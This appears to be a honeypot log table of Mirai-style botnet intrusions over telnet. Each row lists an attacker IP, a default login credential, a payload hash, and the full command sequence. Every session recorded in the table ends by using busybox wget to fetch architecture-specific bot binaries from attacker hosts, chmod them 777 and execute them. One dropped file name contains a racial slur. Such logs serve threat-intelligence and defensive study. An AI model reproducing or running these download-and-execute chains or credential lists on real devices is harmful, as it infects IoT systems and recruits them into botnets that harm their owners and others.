| IP address |
User name |
Password |
SHA256 of the payload file |
 209.141.55.235
| root | taZz@01 | 9b331a5abd252823ef94eb719b4c238370c55eabe2018b8694586411e225ace2 |
enable
shell
system
bah
start
linuxshell
sh
hostname bot_6777
/bin/busybox BOT
/bin/busybox ps; /bin/busybox BOT
/bin/busybox cat /proc/mounts; /bin/busybox BOT
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox BOT
cd /
/bin/busybox cp /bin/echo BNE; >BNE; /bin/busybox chmod 777 BNE; /bin/busybox BOT
/bin/busybox cat /bin/echo
/bin/busybox BOT
cat /proc/cpuinfo; uname -m; /bin/busybox BOT
/bin/busybox wget; /bin/busybox tftp; /bin/busybox BOT
/bin/busybox wget http://198.251.84.216:80//arm -O - > BNE; /bin/busybox chmod 777 BNE; /bin/busybox BOT
./BNE arm; /bin/busybox TOB
/bin/busybox wget; /bin/busybox tftp; /bin/busybox BOT
/bin/busybox wget http://198.251.84.216:80//arm7 -O - > BNE; /bin/busybox chmod 777 BNE; /bin/busybox BOT
./BNE arm7; /bin/busybox TOB
/bin/busybox BOT |
 89.34.27.38
| admin | admin | 97c053fabccf9f9e7c888c105f107483cf2f4d2793e642592a4467ff2b1a689f |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:0800
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://89.34.27.38:80/hakka/helios.sh4 -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi sh4; /bin/busybox AFES
/bin/busybox SEFA |
 89.248.167.133
| root | 7ujMko0admin | 0bb691e95b1be62926bb0067b71bf2d9b81f513f9fd4580bbf1b8017b106df9c |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://89.248.167.133:80/as12a0s/z2s234.m68k -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.m68k; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
89.34.27.38 | root | 12345 | 744918ffdb4a2dcbde7f8927ddfc0346fb48ca7970bb5e930ac9ea9eb132fe45 |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:1047
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
cat /proc/cpuinfo; uname -m; /bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://89.34.27.38:80/hakka/helios.arm -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm; /bin/busybox AFES
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://89.34.27.38:80/hakka/helios.arm7 -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi arm7; /bin/busybox AFES
/bin/busybox SEFA |
85.204.116.64 | admin | admin | b90cb29c437463d799379ec7d3f00b9befe21fc7d88dc4245b22988193829498 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf NiGGeR69xd dropper
/bin/busybox cp /bin/busybox NiGGeR69xd; >NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://85.204.116.64:80/bins/sora.m68k -O - > NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA
./NiGGeR69xd telnet.loader.m68k; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >NiGGeR69xd; /bin/busybox SORA |
89.248.167.133 | root | admin | fc7aef7b6ca68f788b3f66476365830a0b9241fb3670b48caf8cbb31983408dd |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .xxx666 s2m
/bin/busybox cp /bin/busybox .xxx666; >.xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox UNSTABLE
/bin/busybox wget; /bin/busybox tftp; /bin/busybox UNSTABLE
/bin/busybox wget http://89.248.167.133:80/as12a0s/z2s234.spc -O - > .xxx666; /bin/busybox chmod 777 .xxx666; /bin/busybox UNSTABLE
./.xxx666 selfrep.spc; /bin/busybox ELBATSNU
/bin/busybox rm -rf s2m; >.xxx666; /bin/busybox UNSTABLE |
 167.172.241.176
| root | Serv4EMC | 15ceab575b1be5e003849e3a938d8fecabd71ba7823b14b7cfca9f0cd40fe227 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf OnrYoXd666 dropper
/bin/busybox cp /bin/busybox OnrYoXd666; >OnrYoXd666; /bin/busybox chmod 777 OnrYoXd666; /bin/busybox ONRYO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox ONRYO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ONRYO
/bin/busybox wget http://167.172.241.176:80/bins/onryo.mpsl -O - > OnrYoXd666; /bin/busybox chmod 777 OnrYoXd666; /bin/busybox ONRYO
./OnrYoXd666 telnet.loader.mpsl; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >OnrYoXd666; /bin/busybox ONRYO |
167.172.241.176 | root | 7ujMko0admin | ba7b02c7282a43b40935e049f8d90071e90fd3a1f6dbd1a5c2399f0c0eacde9a |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf OnrYoXd666 dropper
/bin/busybox cp /bin/busybox OnrYoXd666; >OnrYoXd666; /bin/busybox chmod 777 OnrYoXd666; /bin/busybox ONRYO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox ONRYO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ONRYO
/bin/busybox wget http://167.172.241.176:80/bins/onryo.sh4 -O - > OnrYoXd666; /bin/busybox chmod 777 OnrYoXd666; /bin/busybox ONRYO
./OnrYoXd666 telnet.loader.sh4; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >OnrYoXd666; /bin/busybox ONRYO |